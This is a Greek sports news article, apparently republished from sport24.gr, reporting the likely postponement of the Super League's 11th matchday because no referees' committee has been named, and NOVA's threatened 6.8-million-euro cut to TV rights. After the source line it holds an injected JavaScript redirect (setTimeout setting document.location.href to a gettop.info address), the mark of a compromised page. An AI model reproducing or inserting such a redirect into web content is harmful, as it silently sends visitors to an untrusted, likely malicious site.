Χωρίς σέντρα το Σαββατοκύριακο

0
7

 

Παρά τις πιέσεις από την πλευρά της FIFA για να ξεκινήσει άμεσα το πρωτάθλημα και παρά το γεγονός ότι όλα τα δεδομένα έδειχναν… σέντρα, εντούτοις κατά 99% οδεύουμε προς αναβολή του πρωταθλήματος αυτό το Σαββατοκύριακο και ως εκ τούτου δεν αναμένεται να διεξαχθεί η 11η αγωνιστική.

Το κύριο πρόβλημα είναι ότι δεν έχει οριστεί η νέα σύνθεση της ΚΕΔ από τον Κώστα Κουτσοκούμνη, επομένως δεν υπάρχουν οι άνθρωποι που θα βγάλουν τους διαιτητές της 11ης αγωνιστικής του πρωταθλήματος. Ανεπίσημα, έχουν ενημερωθεί οι τρεις ομάδες που έχουν ευρωπαϊκά ματς (Ολυμπιακός, Παναθηναϊκός, ΠΑΟΚ) και η ΑΕΚ, η οποία έχει ντέρμπι με το «τριφύλλι».

Να τονιστεί ότι στην συνεδρίαση της Επιτροπής Εξομάλυνσης, την Τετάρτη, πιθανότατα να γνωστοποιηθεί η σύνθεση της νέας ΚΕΔ, όμως θα ήταν παράλογο σε τόσο σύντομο χρονικό διάστημα να οριστεί η νέα Κεντρική Επιτροπή Διαιτησίας και άμεσα οι ομάδες να μάθουν ότι ξεκινάει το πρωτάθλημα μέσα σε 2-3 μέρες.

Οι ομάδες της μεγάλης κατηγορίας ασκούσαν μεγάλη πίεση για να μάθουν το τι μέλλει γενέσθαι, θέλοντας να κάνουν τον προγραμματισμό τους, εξέλιξη δεν υπήρξε και γι’ αυτό οδηγούμαστε σε αναβολή αυτό το Σαββατοκύριακο.

Η θέση της NOVA
Την ίδια ώρα, η NOVA σε συνάντηση που είχε το απόγευμα της Τετάρτης με αντιπροσωπεία της Λίγκας ενημέρωσε ότι εφόσον δεν γίνει πρωτάθλημα το Σαββατοκύριακο θα ενεργοποιηθεί η ρήτρα που προβλέπει «κούρεμα» από τα τηλεοπτικά δικαιώματα της τάξης των 2.8 εκατ. ευρώ.

Το συνδρομητικό παράλληλα, απαιτεί άλλα 2.8 εκατ, ευρώ για τις δύο πρώτες αγωνιστικές που έχουν αναβληθεί και 1.2 εκατ. ευρώ για τα play offs πέρυσι. Σύνολο δηλαδή 6.8 εκατ. ευρώ. Περισσότερα δηλαδή και από το ποσό της χορηγίας της Dimera για το πρωτάθλημα που έχει κλείσει η λίγκα για τα επόμενα δύο χρόνια.

 

 

Πηγή: sport24.gr setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here